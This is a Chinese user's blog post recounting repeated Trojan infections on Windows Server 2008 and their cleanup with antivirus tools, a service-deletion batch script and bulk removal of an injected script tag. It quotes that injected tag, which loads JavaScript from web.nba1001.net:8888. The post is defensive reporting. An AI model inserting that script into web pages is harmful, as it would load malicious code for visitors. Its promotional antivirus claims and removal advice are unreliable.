Windows木马防治“历险记”
来源:互联网 发布:au录音软件 编辑:程序博客网 时间:2024/06/11 09:47
一、遭遇木马
近日,偶在个人的NB上将Windows XP换成了Windows Server 2008。之前使用的卡巴在版本不支持Windows 2008。就打算换个Nod32(ESET Smart Security 4.0)试试。
Windows 2008确实比XP强悍,但后台运行的服务也比XP多。还没来得及细细品味Windows 2008所带来的喜悦与高性能,Win2008就中招了。
Nod32提示中毒,报警中木马了,硬盘指示狂闪。死机~,只得重启。汗~,木马驻入进程,还没来得及进入桌面,又自动重启了。这次完了,别把我硬盘数据又黑掉我了的吧?
重新启动电脑,F8进入安全模式,一看系统服务,果然多了几个陌生的服务:Ias、Irmon、Nla等。只好一个个手工清除掉。
C:/Windows/SYSTEM32/NWCWorkstation.dll
C:/Windows/SYSTEM32/Nla.dll
C:/Windows/SYSTEM32/Nwsapagent.dll
C:/Windows/System32/Ntmssvc.dll
……
用“Windows 清理助手”一查,发现好些个dll文件被感染了特洛伊木马:
(图1)
干掉!
真是郁闷。
二、再次“栽倒”
几天之后,又一次中招!而且是同样的马。
接连两次挂马,严重地干扰了偶的正常的IT生活和工作。对此,偶表示强烈的“谴责”和“抗议”。心想,应该是上次被感染的文件没有彻底清理掉,或者某个文件夹携带有病毒。
解决办法:
用NOD32 全面查杀一遍所有文件。
再用Windows 清理助手将系统扫一遍,发现中ReInstall.exe等几种病毒,清除!加上其他辅助工具:System Mechanic Pro5.5、优化大师WoptiUtilities,对系统进行清理和优化。然后,再装个木马清理王(AttMain.exe Ver5.00.3)把系统监控起来。
对比试用“Windows木马清道夫(防火墙)”,这玩意太占内存了(防护能力如何还不清楚)。
对系统“服务”进行清理。编个bat文件,删掉这些“服务”:
@echooff
echo正在清理系统木马“服务”,请稍等......
scdelete FastUserSwitchingCompatibility
scdelete Ias
scdelete Irmon
scdelete Nla
scdelete FastUserSwitchingCompatibility
scdelete Ntmssvc
scdelete NWCWorkstation
scdelete Nwsapagent
echo清理完成!
echo.& pause
三、想哭,哭不出来~
一周之后,系统再一次挂马!顶他大爷的肺~
我开始不相信“组织”了!难道NOD32对木马防护起的作用不大?木马清理王也不够强悍?
于是在网上搜啊,找啊,终于发现一款能有效对付木马的防毒软件AVG!它集合防病毒 + 防火墙,安全防护病毒、蠕虫、木马、黑客。
AVG反病毒软件9.0能实现安全、完美的防护,针对因特网上传播的新一代安全威胁,拥有有效的解决方案。
AVG反病毒软件9.0可确保您的数据安全,保护您的隐私,抵御间谍软件、广告软件、木马、拨号程序、键盘记录程序和蠕虫的威胁,对电子邮件及其附件进行实时监控,以防止计算机感染上病毒。在易于使用的界面之下,提供了高级的扫描和探测方式以及时下最尖端的技术。
下载,安装AVG Anti-Virus plus Firewall9.0,赶紧用AVG扫扫,哇靠~ 一下子查出600多个程序(EXE)被感染了特洛伊木马。
(图2)
赶紧咔嚓了。
在打开本地某个网页文件时,Chrome浏览器提示该网页有web.nba1001.net:8888恶意代码,网页被修改了,在每个网页最后多了一行代码,链接地址为
<script type="text/javascript"src="http://web.nba1001.net:8888/tj/tongji.js">
</script>
再次顶他大爷的~
Google一下,发现许多人反映(报告)也感染了nba 1001。但没指明具体的清除办法。这东西虽然不是很严重,但也影响偶看本地网页文件呀,保存下来的都是值得“珍藏”的好东西啊,而且这些好东西也要经常看看的。
那只好自己想办法了。
请出伴随偶多年的UltraEdit(以下简称UE),UE目前的最新版本为15.2。用它的全文检索功能逐一将这行脚本找出来并删除。
在资源管理器中选定目标,点击右键,选择“在文件中替换(在该目录)”,如图:
(图3)
在查找内容框中输入上述的脚本,替换为空就行了,文件类型输入:*.htm,然后勾选“搜索子目录”,按【全部替换】按钮,
(图4)
然后UE会弹出提示:“多文件替换可能会修改你磁盘中的多个文件……”,选择【是】,UE进行搜索,自动将这行脚本清除(替换)掉。
(图5)
在偶的机子上,光D盘就有5624个htm文件被挂马了。在搜索过程中,有时可能会出错,重来就是了。
其他盘或文件夹也用这方法,花点时间,基本上可以清除干净。
这几天下来,系统再没有发现有特洛伊木马了。AVG在防木马方面果然名不虚传,表现确实出色。系统也不需另外装防火墙了,AVG的Firewall 组件即可满足要求。
四、经验总结
网络有风险,“裸奔”需谨慎。在Windows系统“裸奔”是有风险的,并且应该打上必要的补丁。
检查任务管理器中是否有不熟悉的,或者来路不明的进程,如果有,干掉!
用Your Uninstaller 2010删除 /卸载不需要或不常用的软件程序,让系统保持相对“干净”。
(图6)
在CMD命令行中输入msconfig,查看,并去掉多余的启动项,当然也可用Your Uninstaller实用工具中的“启动管理器”来设置。
定期清除系统临时文件夹和/或系统垃圾:
C:/Windows/temp、C:/Users/XXXX/LocalSettings/temp
清除IE临时文件与缓存:
C:/Users/XXXX/AppData/Local/Microsoft/Windows/Temporary Internet Files
或者用“一键清理系统垃圾文件”批处理也行。
用System Mechanic对系统垃圾清理;对C盘执行“磁盘清理”;
停掉/关闭不常用的服务,以提升系统性能。
最后,系统优化完成后,再次对系统盘Ghost一次。
几点建议:
形成良好的使用习惯,备份数据并GHOST系统,且需要把GHOST的GHO镜像扩展名改掉,需要还原的时候再修改过来。
养成良好的使用杀毒软件和防火墙习惯,即:每个弹出窗口都要仔细查看并快速的判断,切不可随意“确认”、“OK”。
为了计算机安全、尤其是账户安全,请定期使用本文的方法进行计算机病毒检查。
- Windows木马防治“历险记”
- windows installer历险记
- 公司办公网络arp木马防治方案20120519
- Windows 7 Ubuntu双系统安装历险记
- windows内核木马
- 病毒攻击与防治专题之 --IPC连接 手工种植木马 清除与防范
- [病毒防治]图文详解“高级木马的自我保护技术与查杀之策”
- windows建立会话查看木马
- 防治口腔溃疡
- Windows中针对木马的IP安全策略
- Windows Server2003防木马权限设置
- Windows操作系统常遇木马预防技巧
- Windows Server 2003防木马权限设置
- windows 2003防木马的安全设置
- Windows Apache 下防 PHP 木马设置
- windows主机手动木马查杀
- 木马
- 木马
- 关于hibernate date 检索的一片文章
- 最新版飞鸽传书(http://www.freeeim.com)下载
- 让RadRails可以提示语法
- MySQL的外键约束之级联删
- 真麻烦
- Windows木马防治“历险记”
- the Sunwell Isle will be available for play
- GridView的编辑用法
- 大三的寒假Silverlight之旅 1
- SOAOffice2010:企业内部在线Office史上的里程碑
- GSTREAMER SMALL
- 关于Tomcat的 The APR based Apache Tomcat Native library which allows optimal performance in production environments was not found o
- CARDINALITY
- IP地址和MAC地址